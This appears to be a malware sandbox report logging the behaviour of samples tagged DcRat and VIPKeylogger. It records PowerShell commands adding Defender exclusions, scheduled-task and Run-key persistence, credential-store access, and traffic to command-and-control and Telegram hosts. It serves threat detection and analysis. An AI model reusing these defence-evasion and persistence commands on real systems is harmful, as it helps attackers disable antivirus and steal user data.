"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qBGrhynT9k.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SchCache\RuntimeBroker.exe
"C:\Windows\SchCache\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0ba4ddaa-2c4c-440c-91ea-27a1f3bfde1a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7d2ed16b-a161-447d-b2d2-35a36bb2eea3.vbs"
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20626e4a-0faf-4ef3-8ddf-a195b3f2a6e8.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e7969a5-c762-4775-ad8b-e59e5d56ba70.vbs"
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\016572c6-dcbe-4182-ba74-32fa00f2c5ad.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\71eb074a-ff8c-4127-bcc0-fbc231863966.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0889572.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
Files
memory/4440-0-0x00007FFB5C993000-0x00007FFB5C995000-memory.dmp
memory/4440-1-0x0000000000360000-0x0000000000C58000-memory.dmp
memory/4440-2-0x00000000013E0000-0x00000000013E1000-memory.dmp
memory/4440-3-0x00007FFB5C990000-0x00007FFB5D451000-memory.dmp
memory/4440-4-0x0000000001420000-0x000000000142E000-memory.dmp
memory/4440-5-0x0000000001430000-0x000000000143E000-memory.dmp
memory/4440-6-0x0000000001440000-0x0000000001448000-memory.dmp
memory/4440-7-0x0000000002E90000-0x0000000002EAC000-memory.dmp
memory/4440-8-0x0000000003030000-0x0000000003080000-memory.dmp
memory/4440-10-0x0000000002FE0000-0x0000000002FF0000-memory.dmp
memory/4440-9-0x0000000002EB0000-0x0000000002EB8000-memory.dmp
memory/4440-13-0x0000000003020000-0x0000000003032000-memory.dmp
memory/4440-12-0x0000000003010000-0x0000000003018000-memory.dmp
memory/4440-11-0x0000000002FF0000-0x0000000003006000-memory.dmp
memory/4440-14-0x0000000003090000-0x000000000309C000-memory.dmp
memory/4440-15-0x0000000003080000-0x0000000003088000-memory.dmp
memory/4440-16-0x00000000030A0000-0x00000000030B0000-memory.dmp
memory/4440-17-0x000000001B980000-0x000000001B98A000-memory.dmp
memory/4440-18-0x000000001BAC0000-0x000000001BB16000-memory.dmp
memory/4440-19-0x000000001B990000-0x000000001B99C000-memory.dmp
memory/4440-20-0x000000001B9A0000-0x000000001B9A8000-memory.dmp
memory/4440-21-0x000000001BB10000-0x000000001BB1C000-memory.dmp
memory/4440-22-0x000000001BB20000-0x000000001BB28000-memory.dmp
memory/4440-24-0x000000001D2F0000-0x000000001D302000-memory.dmp
memory/4440-25-0x000000001D850000-0x000000001DD78000-memory.dmp
memory/4440-33-0x000000001D580000-0x000000001D58A000-memory.dmp
memory/4440-41-0x000000001D600000-0x000000001D60C000-memory.dmp
memory/4440-40-0x000000001D700000-0x000000001D70A000-memory.dmp
memory/4440-39-0x000000001D5F0000-0x000000001D5F8000-memory.dmp
memory/4440-38-0x000000001D5D0000-0x000000001D5DC000-memory.dmp
memory/4440-37-0x000000001D5C0000-0x000000001D5C8000-memory.dmp
memory/4440-36-0x000000001D5B0000-0x000000001D5BE000-memory.dmp
memory/4440-35-0x000000001D5A0000-0x000000001D5A8000-memory.dmp
memory/4440-34-0x000000001D590000-0x000000001D59E000-memory.dmp
memory/4440-32-0x000000001D570000-0x000000001D57C000-memory.dmp
memory/4440-31-0x000000001D5E0000-0x000000001D5E8000-memory.dmp
memory/4440-30-0x000000001D360000-0x000000001D36C000-memory.dmp
memory/4440-29-0x000000001D350000-0x000000001D35C000-memory.dmp
memory/4440-28-0x000000001D340000-0x000000001D348000-memory.dmp
memory/4440-27-0x000000001D330000-0x000000001D33C000-memory.dmp
memory/4440-26-0x000000001D320000-0x000000001D32C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RCX65C0.tmp
| MD5 | 5d8505501b7faa4c7e541b0a32467a58 |
| SHA1 | ed0b9de10c38774af49d9279e25a8958817f33a7 |
| SHA256 | 1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca |
| SHA512 | a1fb110b16700001f75d4f74d93746349b5e2e78d4a5dde84c00ffe4eeed914cf7a3702de507c9a287f6df54a4cc0a4010a6bc28e4b641e8d5dcf20db6a302d9 |
C:\Windows\SchCache\RuntimeBroker.exe
| MD5 | 22a708087242dc27cf3b2287dcef9c54 |
| SHA1 | edfd010cb5168ed11f6e527011862f0341f41257 |
| SHA256 | b14a69a55e6297ed6f45ff0142f11882c237dd1ec5f6d754ba81afeb79f82a5d |
| SHA512 | e7c46dcc261bb1bee2c4c7460a31f88191c44fd69d276ac4b68c91192fe4c541db42443fb25c1616ff00d254a52e7eaea2c74813a34135eeb2f0356f63e999ef |
C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe
| MD5 | c4f20b3daec8da9201a5db7645dbecbc |
| SHA1 | 6840df79e3192739090b6e2eb73a02069493d920 |
| SHA256 | 93f7c3241d7f7ddd215eca92edc2c0f75588e1655bf3e82c9a4144cbce37f312 |
| SHA512 | 980aa912418c7182fb5d95e641ed33fcdbbda33b819a300b39478f46cd3e024a342533248a5feb5adbece9dd48f7b0343dd8b49fae6c1484f2486304ad68201e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45q3dq30.1kd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/884-125-0x000001D07E230000-0x000001D07E252000-memory.dmp
memory/4440-144-0x00007FFB5C990000-0x00007FFB5D451000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\qBGrhynT9k.bat
| MD5 | 419c283ac4129c67d4061846103ce2b4 |
| SHA1 | 6fe7c117266cd2ade613ea82cf639b209ee1139f |
| SHA256 | d5ebc5a4678364498c5803df0eddf506fdee8761edbdc699cffc325d814480f5 |
| SHA512 | 774f71852835b8f67f78f547244aab11422e4732ad50f17e8a5a2db7b219ed6a76dd92f5eebbfa26e47a337e4b4630519d0848328565137c5220f01025df7ba2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 856d4328f99937476c1d34b5a03daaf8 |
| SHA1 | 367f439b74760c236f1a95cf5d7de28ff3ec4b40 |
| SHA256 | 6159722066119c162ed49973d2852c8c4420d89fcc78e69e2e7317a53f85cca1 |
| SHA512 | 7782c1f714d9c21512b46f0c3caa1c475d304f0fd9b6c4537b3c4ac3b3a5ec9a6ee83d5240867364c34c8ac7a751f90aacce6d952d5ea17af834c65a5ef5d91e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 672e8b21617ca3b368c6c154913fcfff |
| SHA1 | cb3dab8c008b5fba2af958ce2c416c01baa6a98b |
| SHA256 | b6ce484f4dcfab37c7fac91278a1d66c8b122865f12511634b8c5eac3fc081ec |
| SHA512 | 98b45d5545237042c9d4e99e6aa2d514bb643c80cccd1f79ca8e6412a7949fc235f2f6a5fc12a7f772e1af2343ab2e2fb863d161f1d0da3326e636c52513c7ad |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c56ba5098c530bbd1cdb28d50090d39 |
| SHA1 | ff63178ea722ec2db118c81051bf85544fb6b316 |
| SHA256 | 0299d374c4b984cb0475284b966dfbe8bb08e45b93dabdf327f96a60b05273d1 |
| SHA512 | cbbf27ac30e55f4df35ae5aae50d1a2f9475dc2ac0eecf9ce0ab19adef606fff08c26d0eef5686012d36566551179afe09b15c1da1840415b1696f76324a03f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a39de506d9f3cb0eef9451868bf8f3ff |
| SHA1 | 183758ff7964ae923989989be46a822e0d4dc37f |
| SHA256 | d982bcb0bdbe495e997ead8d128c2f8f0bb66c41fc5e0142d4fb5bf9193e1416 |
| SHA512 | 041df31ed5f2668dcf99143cbffcc7891394f33c6229f2459cba2226f07a8fcf31e072db62c6735fdb4b9fbc103998094a735a285db84a69bb7d983ffb96efaa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f3d606f9a5f1201bfc1f01c54e842c4 |
| SHA1 | f1917e50b557b135953ecbe63e1fc1e675b541f1 |
| SHA256 | dcc09d3b5b17ef60cb35e4148230306cdcd68d18d18a39fd5fe220c34997a32a |
| SHA512 | d85e1e1b4a552a8cdd21c4195a2ea082d3fcb40907d2a6a0ceb297f32defd1fba17d3b54dc954c26b3b731bc179bee5cfc011de3c667af47cdbe289b30fdfb38 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f0db2be09ea50e93f81f83a58fdc049 |
| SHA1 | 862883227880dde307538079454109d35f39723e |
| SHA256 | b747c644e6479e6e921d09626c68d2df0d33d2a707f9432e5fc1b138e6c9387d |
| SHA512 | a7f4644e8f4a0dd59f47645ba7afe312c9e714f923019add5cddf6491f3466731abd66c854bdaa497c0f162c1ae08df5c6506e2171ec9d74ae5c9ffcd69f0773 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ea2f44a25582e20c2e1d21c73bbd4fa1 |
| SHA1 | d63ef1804bad1a542aeb3cf5111cd86a9111d7a1 |
| SHA256 | 43ec39d124ebadf53f254b9aef5f1d2f73526a681682d0409af5e34beb8737d8 |
| SHA512 | 49ed57cd127b56793cf2bc1dfae0ccb45d3a9eaaf9475ea7ec65b4d6782c0b846b832bedfa19e65c4b54d7a7b19dfd177bfcb3e0fadad8640c4bb6515ee2c835 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 354ebb8d437ee057dacfef36baced4e9 |
| SHA1 | 30460dbe64847ebb524d7d1fd5b9bf8a851a7626 |
| SHA256 | bcf3ba98af6ee96a3eba9bbc6bdb2ae36b883f5f1e9cdad2974cbbcb9c102237 |
| SHA512 | 1f2cb272ad33df6e34949ac4d60ec0702316d9e21992be52cd9c6abd846472e7c868a8e96b5922b016e7952e460671e5768d007e28d84940a1b956eef4705b53 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 990f2ad22e4ee8bb16d0e84568ff1c04 |
| SHA1 | 8ee103c2c4969dd252d3f136479e718361e2ace2 |
| SHA256 | 9e058905555242348650ecae8008fd39cf63bac0f3160637aab912fd54fd2578 |
| SHA512 | ab70a31915f4241c23a020a0e1c8ad5b2468c06911ceb4418b5377619953780f14070a2674858b1a7d999b356448ffdb51db6393e56f20defb291866383f5802 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3452-255-0x0000000000DF0000-0x00000000016E8000-memory.dmp
memory/3452-257-0x000000001D370000-0x000000001D382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0ba4ddaa-2c4c-440c-91ea-27a1f3bfde1a.vbs
| MD5 | 9d2cb3a1c306ab483d679cbc4501b77b |
| SHA1 | 3c164647f53162cd52a36e101e9e0564ed5564d0 |
| SHA256 | 7153cdad4019e129359209facf9def753001fe5feb4b589e95de99cbd700097b |
| SHA512 | ea042c73f6e931219ee1731879d7b9d635239848998a232c16c9907130a7d91bb49974cd35b355166f2befb5cd21f12713964bb4a95be1115fbe369b2e27e2bf |
C:\Users\Admin\AppData\Local\Temp\7d2ed16b-a161-447d-b2d2-35a36bb2eea3.vbs
| MD5 | e066f2f4b6ad5a9d0ea363ecb06f39fb |
| SHA1 | 11475ba0dc83b982056b11bca29b76a0c0669359 |
| SHA256 | 8fdb7c35e437cd511fbc0ef39569c3ed897ce87d37e8f4e2055debd005f5638c |
| SHA512 | 0db1a7449c6cf1eb814ed802bb3492a8d56e6cb31b139241d59b5b7972288a748c6698da2ddf3ad925a8bd57ada3fe8889fc58a0cc42d619c8e0f365ccb4db62 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 229da4b4256a6a948830de7ee5f9b298 |
| SHA1 | 8118b8ddc115689ca9dc2fe8c244350333c5ba8b |
| SHA256 | 3d63b4a66e80ed97a8d74ea9dee7645942aafbd4abf1b31afed1027e5967fe11 |
| SHA512 | 3a4ec8f720000a32bb1555b32db13236a73bb6e654e35b4de8bdb0fc0de535584bc08ebe25c7066324e86faa33e8f571a11cc4e5ef00be78e2993e228f615224 |
C:\Users\Admin\AppData\Local\Temp\20626e4a-0faf-4ef3-8ddf-a195b3f2a6e8.vbs
| MD5 | df51fa1d2b197e92d0c729951cb4eacb |
| SHA1 | 2bc7bf81c37accb381f81c83bccef9bf49ee719d |
| SHA256 | c180f6165ba171d913f166fefed5f69c040e3d20ba96435c4b728daac1d85fa4 |
| SHA512 | 6f26152fdb48083366608bad541ba556ff8f65cce319acb13c9dbd2aa3aa66776f47c436023400a52743c2a7092f276ed1308dab2515f339acb32dcad867bff4 |
memory/3928-283-0x000000001DB00000-0x000000001DB12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\016572c6-dcbe-4182-ba74-32fa00f2c5ad.vbs
| MD5 | 0c7e8ce20911836f15b1542c555e8dcc |
| SHA1 | 0bd49cfd05078cceeb0aa301133f33dab95cbba9 |
| SHA256 | 0ca836d9c5ff38e389e3aa620d9b2ee26b4d4e7185b1a6ce8db89ac5d617b074 |
| SHA512 | 99a78e24f46d98c088e9339cb83adf08348c532888ccce3aa76e98f69778a6b90bf43ecaeed0e56ce754d76f173b85e91e8808babd2559cd8f50ddef0d1df4bd |
Analysis: behavioral9
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2348 set thread context of 2752 | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\LbXyTV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LbXyTV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF0B5.tmp"
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.112.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
memory/2348-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
memory/2348-1-0x0000000001270000-0x0000000001322000-memory.dmp
memory/2348-2-0x0000000074A80000-0x000000007516E000-memory.dmp
memory/2348-3-0x0000000000540000-0x0000000000550000-memory.dmp
memory/2348-4-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
memory/2348-5-0x0000000074A80000-0x000000007516E000-memory.dmp
memory/2348-6-0x0000000004EA0000-0x0000000004F2E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ABCJFME44B4CV80LK6HC.temp
| MD5 | dcbaa970f0757370ee49b3f0c7b7285b |
| SHA1 | 75915ebf67e6e1a7f6c93610711645cdac8a653e |
| SHA256 | 378ddb79ce32e7244786209333123fc77b9ee33d9a0aaa31f6e2842353f6fc99 |
| SHA512 | f2f98a190eb20a1098d416e93002af3130a76f88c6809a0d41b62d46d49e74f77e01ffa2ba0554d9e94c2cc77a454adaf61424b42b5f71fb52da15871f3258dd |
C:\Users\Admin\AppData\Local\Temp\tmpF0B5.tmp
| MD5 | 466b40fe54d1ea6c03f569d5bb3607e2 |
| SHA1 | 1699e64c15e44b536752d2bd40799ffffbea167c |
| SHA256 | d6e49379d1626cb5811940cfb7b29b40cc313c6986b80388ed603db300ac4dc2 |
| SHA512 | 6566bff61ee5c8c730372e65fc2dd7088d94ddd5c5a796adfb2efcde2052585da18693b55173c58cadfb7a800baed853760f82c5b3a97fd3338634e5ff5dda6a |
memory/2752-30-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2752-29-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2348-31-0x0000000074A80000-0x000000007516E000-memory.dmp
memory/2752-28-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2752-27-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2752-25-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2752-23-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2752-21-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2752-19-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
130s
Max time network
144s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Protector.exe" | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe
"C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
Files
memory/2848-0-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp
memory/2848-1-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-2-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-3-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-4-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-5-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-8-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp
memory/2848-9-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-10-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
